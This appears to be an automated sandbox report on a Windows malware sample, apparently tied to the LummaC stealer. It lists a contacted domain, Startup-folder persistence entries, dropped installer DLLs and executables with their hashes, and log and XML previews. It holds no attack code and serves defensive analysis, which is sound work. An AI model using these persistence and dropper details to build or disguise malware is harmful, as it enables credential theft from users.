http://www.vmware.com/specifications/vmdk.html#sparsehttp://www.vmware.com/interfaces/specifications | Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp | false | | unknown
http://appsyndication.org/2006/appsyn | KClGcCpDAP.exe | false | | unknown
IP:188.114.96.3
Domain:apokalipo.cyou
Country:European Union
ASN:13335
ASN Name:CLOUDFLARENETUS
Malicious:false
                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1527626
                                                    Start date and time:2024-10-07 07:13:10 +02:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 9m 14s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:21
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:1
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:KClGcCpDAP.exe
                                                    renamed because original name is a hash value
                                                    Original Sample Name:61d2baf57c3ed6eda2d72720fc54ed04.exe
                                                    Detection:MAL
                                                    Classification:mal96.spyw.expl.evad.winEXE@22/25@1/1
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 112
                                                    • Number of non-executed functions: 273
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:14:06 | API Interceptor | 1x Sleep call for process: KClGcCpDAP.exe modified
01:14:38 | API Interceptor | 2x Sleep call for process: cmd.exe modified
01:14:53 | API Interceptor | 7x Sleep call for process: validPower_Lnz_x64.exe modified
06:14:24 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT7718.tmp
06:14:37 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PFUUltra.lnk
Match | Associated Sample Name | Detection | Threat Name
C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\VBoxDDU.dll | orderconfirmation.exe | malicious | LummaC
C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | 46L03o2EOY.exe | malicious | Unknown
                                                          Process:C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):5537870
                                                          Entropy (8bit):7.692584840450482
                                                          Encrypted:false
                                                          SSDEEP:98304:QHevOfbm1blCTylnpvLG66RbQ/j70Z79EeBavpi7A6JBYA4cfunYkKpRO/:oe6qrnhG6N/j7WTYQs6JBTpf/fg
                                                          MD5:A05D34B4AF9019924CC181D9F0C99133
                                                          SHA1:B8518F765711A9D715FBBA3615E210C5B98434CA
                                                          SHA-256:1B97E2882218CC463E27F11517025353C5881D90C8E5E55EA1ECC6B992BA016D
                                                          SHA-512:A3BB7BDA948633D6B006BC5252FAF5E3884BF38D75470877CFF37938BF6D3620264BB491B8AAA6FAA89731F9D701389FCEBFC0AA4826454FA24A82D1EC174A99
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):5537870
                                                          Entropy (8bit):7.692585092067747
                                                          Encrypted:false
                                                          SSDEEP:98304:8HevOfbm1blCTylnpvLG66RbQ/j70Z79EeBavpi7A6JBYA4cfunYkKpRO/:Ee6qrnhG6N/j7WTYQs6JBTpf/fg
                                                          MD5:A25B65F9A2EF04E4E8C65F3253CC42C2
                                                          SHA1:A014CD2B5672DC7909BB5D915D19D44D7C64D133
                                                          SHA-256:AEBEEBD2C501B876F7B557B888F612C8AF638B114ADF654CAAE2F4B1290B83D1
                                                          SHA-512:DAEC2C17375342A308B9E6707370D6A5881E61C91DCC661FD6A125517BC8E0A6E5C7222AF1AAEC4106C7AECE46F0E32CB268CF6C2809045D36F3F0D9FD05B8FD
                                                          Malicious:false
                                                          Process:C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):987
                                                          Entropy (8bit):5.417951670591397
                                                          Encrypted:false
                                                          SSDEEP:24:rbAIeLLzz6IYoTcP2wY2cP2MncP2UfsNFcP2GJIcP2AL:nxY+VlsRChbh/vL
                                                          MD5:A4252F083F8806E5AF461C02CDCF76FB
                                                          SHA1:F410AB5B8E63C14E9704AFDACA3D5DAAFD4A4B57
                                                          SHA-256:76C3A4A45495C44A037751BDD5760E74E3AF4598A9D4EF1941A54F3AEED9EB11
                                                          SHA-512:BD9483F2E138DF7B3EC32FD4AABF979BF57DC3074EC0ACF05B55E16DEF0169B4DC599C03BE8C15F8C00DD6A010CBFD24F08CCE163C1D84262792DB594CE816BD
                                                          Malicious:false
                                                          Preview:[1BF0:1BEC][2024-10-07T01:14:06]i001: Burn v3.11.1.2318, Windows v10.0 (Build 19045: Service Pack 0), path: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe..[1BF0:1BEC][2024-10-07T01:14:06]i009: Command Line: '-burn.clean.room=C:\Users\user\Desktop\KClGcCpDAP.exe -burn.filehandle.attached=524 -burn.filehandle.self=544'..[1BF0:1BEC][2024-10-07T01:14:06]i000: Setting string variable 'WixBundleOriginalSource' to value 'C:\Users\user\Desktop\KClGcCpDAP.exe'..[1BF0:1BEC][2024-10-07T01:14:06]i000: Setting string variable 'WixBundleOriginalSourceFolder' to value 'C:\Users\user\Desktop\'..[1BF0:1BEC][2024-10-07T01:14:06]i000: Setting string variable 'WixBundleLog' to value 'C:\Users\user\AppData\Local\Temp\Coastguardsman_20241007011406.log'..[1BF0:1BEC][2024-10-07T01:14:06]i000: Setting string variable 'WixBundleName' to value 'Coastguardsman'..[1BF0:1BEC][2024-10-07T01:14:06]i000: Setting string variable 'WixBundleManufacturer' to value 'Friarbird'..
                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                          File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):2440704
                                                          Entropy (8bit):6.770175571116754
                                                          Encrypted:false
                                                          SSDEEP:49152:8IWkFYuXpRMXFltR9cFWkYQ47ZcDacMG+S/Y7Szu6ID4ANA9mzlazGesK/WdpfBW:/+rtnj6IBNA0ZazGmyc
                                                          MD5:B671C30F27A58DA64F62E00F4A8F7858
                                                          SHA1:6912A5B517132037D2CA9C8D6840993952624CDA
                                                          SHA-256:B349504434ED7B3E4E051F08A93E1383444FB1CE94895F5172B7F1760C712805
                                                          SHA-512:6F52AEC623161C2C1E4276019C666C9485FFD0F78627E619EDDC5B02B6FA4B6B5972D07047854E61E959C40331934ADD09458E59C697732DD3A800EFADBFE538
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):5537870
                                                          Entropy (8bit):7.692585388546547
                                                          Encrypted:false
                                                          SSDEEP:98304:LHevOfbm1blCTylnpvLG66RbQ/j70Z79EeBavpi7A6JBYA4cfunYkKpRO/:re6qrnhG6N/j7WTYQs6JBTpf/fg
                                                          MD5:EBD3DF5FD956E7F15C2AA15A94DF12E7
                                                          SHA1:9058C43027EBD0F571009DDE377D93B05042F5DC
                                                          SHA-256:9CE3596EB51E5974FCD2C8BE193B055A55A2D7A402CAD07465D0470C1E7472C5
                                                          SHA-512:3EBE66D716B6B6BAB9FBB0CE611CAF83A932DD73A43CCDF15DDDF6B0417405D72AC3D9CDB484DC9A4172F03F226E8C285C753CF032ACA21E95AFC06A7E05C013
                                                          Malicious:false
                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                          File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):2440704
                                                          Entropy (8bit):6.770175571116754
                                                          Encrypted:false
                                                          SSDEEP:49152:8IWkFYuXpRMXFltR9cFWkYQ47ZcDacMG+S/Y7Szu6ID4ANA9mzlazGesK/WdpfBW:/+rtnj6IBNA0ZazGmyc
                                                          MD5:B671C30F27A58DA64F62E00F4A8F7858
                                                          SHA1:6912A5B517132037D2CA9C8D6840993952624CDA
                                                          SHA-256:B349504434ED7B3E4E051F08A93E1383444FB1CE94895F5172B7F1760C712805
                                                          SHA-512:6F52AEC623161C2C1E4276019C666C9485FFD0F78627E619EDDC5B02B6FA4B6B5972D07047854E61E959C40331934ADD09458E59C697732DD3A800EFADBFE538
                                                          Malicious:false
                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):2364728
                                                          Entropy (8bit):6.606009669324617
                                                          Encrypted:false
                                                          SSDEEP:49152:lbCT2kOGRpfJMi3kLRQrjYgeeZyTDwMHfDYZNBi:TkOKMiY0BZMHfDYZNBi
                                                          MD5:967F4470627F823F4D7981E511C9824F
                                                          SHA1:416501B096DF80DDC49F4144C3832CF2CADB9CB2
                                                          SHA-256:B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
                                                          SHA-512:8883EAD428C9D4B415046DE9F8398AA1F65AE81FE7945A840C822620E18F6F9930CCE2E10ACFF3B5DA8B9C817ADE3DABC1DE576CBD255087267F77341900A41C
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Joe Sandbox View:
• Filename: 46L03o2EOY.exe, Detection: malicious
                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Oct 7 04:14:07 2024, mtime=Mon Oct 7 04:14:08 2024, atime=Sun Oct 6 07:05:58 2024, length=3559696, window=hide
                                                          Category:dropped
                                                          Size (bytes):924
                                                          Entropy (8bit):5.04272071613665
                                                          Encrypted:false
                                                          SSDEEP:12:8FyK4EWCaddY//fpuLAV72h6dbxYjAArHRRUJBHEFyBmV:8evvd+3pIY72hCx8AAtRUf3Bm
                                                          MD5:E39B41AE526DB5DE5395D18C3A1EF265
                                                          SHA1:D33530ADEC2E028267D1EF442E3D48736ADD20B4
                                                          SHA-256:D9409DCFCBA4AE308848C5890551C5C7902EEED9054314BC8F3FA0130172E2CE
                                                          SHA-512:32D94E30CB44118C90D0E31BCC4DEB50EA2E8D1879F160B4855ED59B6E17FA473F71E481C176B58A285BE06688F4B5ED021A8513AAE9E24FE01668D02992C13B
                                                          Malicious:false
                                                          Process:C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):380176
                                                          Entropy (8bit):6.432472275317664
                                                          Encrypted:false
                                                          SSDEEP:6144:TTKw9G2rivrR7YR+euVO05XMog3N0++++I333O333qj333MEq333h3333f92333O:CcN3u++++I333O333qj333MJ333h333r
                                                          MD5:496DF6AD1A158ED5037138E397713EF0
                                                          SHA1:287BD2219C955687BAA399DED57E9AB64334C63C
                                                          SHA-256:07C04290F53AAAAA7DF6B6EA3A53103B6E3EF8FF658D8097617A9C48DFC6E90A
                                                          SHA-512:422DA26A8F50C1F02C1CC7C4BED37CDB33732039BBA82F32C2A14BAA8C6A7BC5544856AB26A2071B5EA8E731A296E2C69071DA2F067312D05763AA3A9928BB3A
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Joe Sandbox View:
                                                          • Filename: orderconfirmation.exe, Detection: malicious
                                                          Preview:(PE image: MZ/DOS stub, sections .text .rdata .data .pdata .reloc)
                                                          Process:C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4242944
                                                          Entropy (8bit):6.558992499072821
                                                          Encrypted:false
                                                          SSDEEP:49152:zTNFpHJVfZqJru0K1kLo7RrObviwkZcrA2P16szn0uyIeOGTrLvQb8Sg7Z:TVfZq+1kLRGIn0uy7wb8
                                                          MD5:24860E7E6DB53271D89CC5A9D7F4C73A
                                                          SHA1:AA1B31CC4B7B451B65F7D60DE02301F89C2247EF
                                                          SHA-256:1F9F015E8363E279491D893782F506617A8D97E8901B71950DD5782FD1C6A21E
                                                          SHA-512:2B16D70C1B9C0A4F38CA7B88A131E69DE2DC880FE0048860A9ED1D80AE2359E0CE0F6FBCE191CFB59FD4D0AE1D7CB8FF9D44844F45BF6206AC1B7EA1A8349F3D
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                          Preview:(PE image: MZ/DOS stub, sections .text .rdata .data .pdata .rsrc .reloc)
                                                          Process:C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe
                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3559696
                                                          Entropy (8bit):6.200307727314802
                                                          Encrypted:false
                                                          SSDEEP:49152:AQ902GYI12BpN8G/i6Hdw2u68X5RPrftuX9wZcQm2J9FjdH0pdTrRBlkG0BjMEgr:H9DGYIob9wp68pRzVsiHI9atBjMEY
                                                          MD5:C8A2DE7077F97D4BCE1A44317B49EF41
                                                          SHA1:6CB3212EC9BE08CB5A29BF8D37E9CA845EFC18C9
                                                          SHA-256:448402C129A721812FA1C5F279F5CA906B9C8BBCA652A91655D144D20CE5E6B4
                                                          SHA-512:9815EBA1566A8E33734F6A218071EC501DD1F799B1535E25D87C2B416B928AE8D15F8218CF20E685F9907EC39C202CBFC4728FE6AB9D87B3DE345109F626845E
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:(PE image: MZ/DOS stub, sections .text .rdata .data .pdata .rsrc .reloc)
                                                          Process:C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4404646
                                                          Entropy (8bit):7.953147866148555
                                                          Encrypted:false
                                                          SSDEEP:98304:Pw2L5u5Ahg6i2pmv4ECQx/gPtB09ES7GME15o:uz6xmv4JMgjBSSN15o
                                                          MD5:EB9428E9ED12824BEB9193BEA1DE018B
                                                          SHA1:804E7CF5B5EC4AE00183F7732DD4C8BEEFEC1E33
                                                          SHA-256:97DD176827F278064CD981567F992CFB7F2BA966377BE03163C9C32C28F4CB9A
                                                          SHA-512:3CC2BB1111C9BD557195DF53F041563A9BF91F03F2E1385CCB25AA5EADB6C1F7CF2D3FFBB090418C340763CD29E129BDB41C86EC2CD7975D7B02EB7CF13DBC96
                                                          Malicious:false
                                                          Process:C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):66844
                                                          Entropy (8bit):4.603621025311295
                                                          Encrypted:false
                                                          SSDEEP:1536:wwBw6vQwfuDIO9zR3hNIyByM1kelM5VZmiXwy6Mno8aCPCzw:L2qQ3I4z/NIQyPelWtwy6Mn1auh
                                                          MD5:48AA3E0E2CB511F84BF02ABFB6BF1824
                                                          SHA1:F9C0E44CBCFACD1662420161D97AF4EAD8193368
                                                          SHA-256:8E837DBC26C3A1DE1252164FEC16FFF6D681F764CCD90ED4E42FE1E7F020808A
                                                          SHA-512:D4DDAB655C732CC3073CBFDB7CB8786B2474049AC52B713FDBA53F4C8A17ACB42D6FBDEBC55E4CD287CD37A7A00F3541578E6062D9832D0FCA48107F84A77E0A
                                                          Malicious:false
                                                          Process:C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):608080
                                                          Entropy (8bit):6.297676823354886
                                                          Encrypted:false
                                                          SSDEEP:12288:koBFUsQ1H5FH3YUTd/df0RA7XkNvEKZm+aWodEEiblHN/:dFUsQ1H5FHdGKkNvEKZm+aWodEEcHN/
                                                          MD5:D029339C0F59CF662094EDDF8C42B2B5
                                                          SHA1:A0B6DE44255CE7BFADE9A5B559DD04F2972BFDC8
                                                          SHA-256:934D882EFD3C0F3F1EFBC238EF87708F3879F5BB456D30AF62F3368D58B6AA4C
                                                          SHA-512:021D9AF52E68CB7A3B0042D9ED6C9418552EE16DF966F9CCEDD458567C47D70471CB8851A69D3982D64571369664FAEEAE3BE90E2E88A909005B9CDB73679C82
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:(PE image: MZ/DOS stub, sections .text .rdata .data .pdata .rsrc .reloc)
                                                          Process:C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):829264
                                                          Entropy (8bit):6.553848816796836
                                                          Encrypted:false
                                                          SSDEEP:12288:QgzGPEett9Mw9HfBCddjMb2NQVmTW75JfmyyKWeHQGoko+1:HzJetPMw9HfBCrMb2Kc6dmyyKWewGzB1
                                                          MD5:366FD6F3A451351B5DF2D7C4ECF4C73A
                                                          SHA1:50DB750522B9630757F91B53DF377FD4ED4E2D66
                                                          SHA-256:AE3CB6C6AFBA9A4AA5C85F66023C35338CA579B30326DD02918F9D55259503D5
                                                          SHA-512:2DE764772B68A85204B7435C87E9409D753C2196CF5B2F46E7796C99A33943E167F62A92E8753EAA184CD81FB14361E83228EB1B474E0C3349ED387EC93E6130
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:(PE image: MZ/DOS stub, sections .text .rdata .data .pdata _CONST, a second .text, data, .rsrc .reloc)
                                                          Process:C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):224447
                                                          Entropy (8bit):6.442059221275934
                                                          Encrypted:false
                                                          SSDEEP:6144:IyoStdQp+6F4lElBs1QlBUYroYbCVf1JJKDo7wvFR58AJfdh:IyoStdQUBElBs1Ql2YEs//h
                                                          MD5:D13F84F117685C1B3BD321CA4A8E9F34
                                                          SHA1:137A58F8A95126D8A033CFC84F1020A92F794069
                                                          SHA-256:0A5FCDC9B80E5AB3767E8CB89EC8D7FF166BBBA96D3569557B81427BEAA68508
                                                          SHA-512:5C7346450BE04ADE7E967D4EAAE31208876981E0540925B5A56F961B196701B997653BEC8F0B3CB5ECC886F28273B384D49FD16F6FC6A0E0712A4FE3B2B08973
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                          Preview:(PE image: MZ/DOS stub, sections .text .data .rdata /4 .bss .edata .idata .CRT .tls .rsrc .reloc)
                                                          Process:C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (472), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):2366
                                                          Entropy (8bit):3.7598685393990285
                                                          Encrypted:false
                                                          SSDEEP:48:y+03qHhhObBXjvpne1GgZEJ0z0w8g5yc3gkTxR4VvgkWHaisgUGgprRiGGgpr5kl:X0n6LH0w9ycRRovgkTH7rRV7rI
                                                          MD5:F731DB3DEAE9A801F932CFB3671C732F
                                                          SHA1:E4714D83F7203DDCCAD1221BA67A7BC147AAF14F
                                                          SHA-256:79C65F96AD557EC77D3A266F2C455464C102AE4A0FA440F1F302D43B9FAB9696
                                                          SHA-512:03CB06A55A71D5FE52D58430DFE2EAB17740C97016649E20F25ECE6D7A03A47B885993997698C19A99578554254F131EB43319DE80D29B160F11FA22F1003BA5
                                                          Malicious:false
                                                          Preview:(UTF-16 XML, decoded) <?xml version="1.0" encoding="utf-16"?> <BootstrapperApplicationData xmlns="http://schemas.microsoft.com/wix/2010/BootstrapperApplicationData"> <WixBundleProperties DisplayName="Coastguardsman" LogPathVariable="WixBundleLog" Compressed="no" Id="{9d434f77-63c5-435b-9722-fdf4a808a610}" UpgradeCode="{A345F56D-1251-4FAE-ABFA-52F0A5F17C44}" PerMachine="yes" /> <WixPackageProperties Package="Gewgaw" Vital="yes" DisplayName="WiX Toolset v3.11 Native 2013 SDK" DownloadSize="58383" PackageSize="5
                                                          Process:C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):380176
                                                          Entropy (8bit):6.432472275317664
                                                          Encrypted:false
                                                          SSDEEP:6144:TTKw9G2rivrR7YR+euVO05XMog3N0++++I333O333qj333MEq333h3333f92333O:CcN3u++++I333O333qj333MJ333h333r
                                                          MD5:496DF6AD1A158ED5037138E397713EF0
                                                          SHA1:287BD2219C955687BAA399DED57E9AB64334C63C
                                                          SHA-256:07C04290F53AAAAA7DF6B6EA3A53103B6E3EF8FF658D8097617A9C48DFC6E90A
                                                          SHA-512:422DA26A8F50C1F02C1CC7C4BED37CDB33732039BBA82F32C2A14BAA8C6A7BC5544856AB26A2071B5EA8E731A296E2C69071DA2F067312D05763AA3A9928BB3A
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:(PE image: MZ/DOS stub, sections .text .rdata .data .pdata .reloc)
                                                          Process:C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4242944
                                                          Entropy (8bit):6.558992499072821
                                                          Encrypted:false
                                                          SSDEEP:49152:zTNFpHJVfZqJru0K1kLo7RrObviwkZcrA2P16szn0uyIeOGTrLvQb8Sg7Z:TVfZq+1kLRGIn0uy7wb8
                                                          MD5:24860E7E6DB53271D89CC5A9D7F4C73A
                                                          SHA1:AA1B31CC4B7B451B65F7D60DE02301F89C2247EF
                                                          SHA-256:1F9F015E8363E279491D893782F506617A8D97E8901B71950DD5782FD1C6A21E
                                                          SHA-512:2B16D70C1B9C0A4F38CA7B88A131E69DE2DC880FE0048860A9ED1D80AE2359E0CE0F6FBCE191CFB59FD4D0AE1D7CB8FF9D44844F45BF6206AC1B7EA1A8349F3D
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                          Preview:(PE image: MZ/DOS stub, sections .text .rdata .data .pdata .rsrc .reloc)
                                                          Process:C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe
                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3559696
                                                          Entropy (8bit):6.200307727314802
                                                          Encrypted:false
                                                          SSDEEP:49152:AQ902GYI12BpN8G/i6Hdw2u68X5RPrftuX9wZcQm2J9FjdH0pdTrRBlkG0BjMEgr:H9DGYIob9wp68pRzVsiHI9atBjMEY
                                                          MD5:C8A2DE7077F97D4BCE1A44317B49EF41
                                                          SHA1:6CB3212EC9BE08CB5A29BF8D37E9CA845EFC18C9
                                                          SHA-256:448402C129A721812FA1C5F279F5CA906B9C8BBCA652A91655D144D20CE5E6B4
                                                          SHA-512:9815EBA1566A8E33734F6A218071EC501DD1F799B1535E25D87C2B416B928AE8D15F8218CF20E685F9907EC39C202CBFC4728FE6AB9D87B3DE345109F626845E
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:(PE image: MZ/DOS stub, sections .text .rdata .data .pdata .rsrc .reloc)
                                                          Process:C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4404646
                                                          Entropy (8bit):7.953147866148555
                                                          Encrypted:false
                                                          SSDEEP:98304:Pw2L5u5Ahg6i2pmv4ECQx/gPtB09ES7GME15o:uz6xmv4JMgjBSSN15o
                                                          MD5:EB9428E9ED12824BEB9193BEA1DE018B
                                                          SHA1:804E7CF5B5EC4AE00183F7732DD4C8BEEFEC1E33
                                                          SHA-256:97DD176827F278064CD981567F992CFB7F2BA966377BE03163C9C32C28F4CB9A
                                                          SHA-512:3CC2BB1111C9BD557195DF53F041563A9BF91F03F2E1385CCB25AA5EADB6C1F7CF2D3FFBB090418C340763CD29E129BDB41C86EC2CD7975D7B02EB7CF13DBC96
                                                          Malicious:false
                                                          Process:C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):66844
                                                          Entropy (8bit):4.603621025311295
                                                          Encrypted:false
                                                          SSDEEP:1536:wwBw6vQwfuDIO9zR3hNIyByM1kelM5VZmiXwy6Mno8aCPCzw:L2qQ3I4z/NIQyPelWtwy6Mn1auh
                                                          MD5:48AA3E0E2CB511F84BF02ABFB6BF1824
                                                          SHA1:F9C0E44CBCFACD1662420161D97AF4EAD8193368
                                                          SHA-256:8E837DBC26C3A1DE1252164FEC16FFF6D681F764CCD90ED4E42FE1E7F020808A
                                                          SHA-512:D4DDAB655C732CC3073CBFDB7CB8786B2474049AC52B713FDBA53F4C8A17ACB42D6FBDEBC55E4CD287CD37A7A00F3541578E6062D9832D0FCA48107F84A77E0A
                                                          Malicious:false
                                                          Preview:..stX..NQv[G.sUPhT.k...KA...a_F.O..M..OG^..C..C...sr]vYf......D^...^d.j..Ox...v.h..q.FF..H.S.j...JiBn..Gf.B.fxm..L..x.p.svi.k.G..A.klkgf.c...Np............w.bG`.efs.b.t.H.A..ji.........]SE.t.yb..d....Vo..k.C.Z..B.s.D...lS]..T\..]h.C\.H....r.k..YJHr..N..[YX.J..gv.k.....\.V.aecltkQ^.......b[y.Lgu...Y.da.EE..d...yf.uVwk...QAx.EJ[bxdap.B.A..g...U.QQo.Z.iU.......f......RQ..bHo[^l`..KDc.mO......T.]M.Vl.xj........]Jeli_i..g...hqB..h.....J^b^.]T..._.......UJseZ...j..].U..n.G._..h.J...Ru....iD.]CTx.soJb......r.Xk].N._.G..`n.kFnWd.G...r..T...wRj.DD...seZ.CV....YB..^....B..W.bEo..fY....nH.yTm[.I.D..pFprBb.rq^\..FE..klN.GDAh...Li\...^u_U]JBYr.Io.....Y.........Tw.L.........].ce.JJgA..X..m.CU.Q.Xh.u..DuJ..U\r.k.e...Qq...EOK.qY.r.ZE.i.]..B....ug.s.GtFKA.C.v.W.aR..n...]..t.Wtr..gFmSq..cxV..Q.b.kU.P.AE.s.QYH.d.y..VW...v....FZ..xSx.C.umJUl.....ARXO.I.].BL..o.Sw...f.fE..o.P_.dkT.mJG.uX.....mLw...X...KQP..BEE..c_iR....T...DJ...s.Z.m.bMH.._.i.x...kn.Bbe_.Y...`K.R.rLccqa.s..G.A.......o..Nv........p]].E.v.Q.
                                                          Process:C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):608080
                                                          Entropy (8bit):6.297676823354886
                                                          Encrypted:false
                                                          SSDEEP:12288:koBFUsQ1H5FH3YUTd/df0RA7XkNvEKZm+aWodEEiblHN/:dFUsQ1H5FHdGKkNvEKZm+aWodEEcHN/
                                                          MD5:D029339C0F59CF662094EDDF8C42B2B5
                                                          SHA1:A0B6DE44255CE7BFADE9A5B559DD04F2972BFDC8
                                                          SHA-256:934D882EFD3C0F3F1EFBC238EF87708F3879F5BB456D30AF62F3368D58B6AA4C
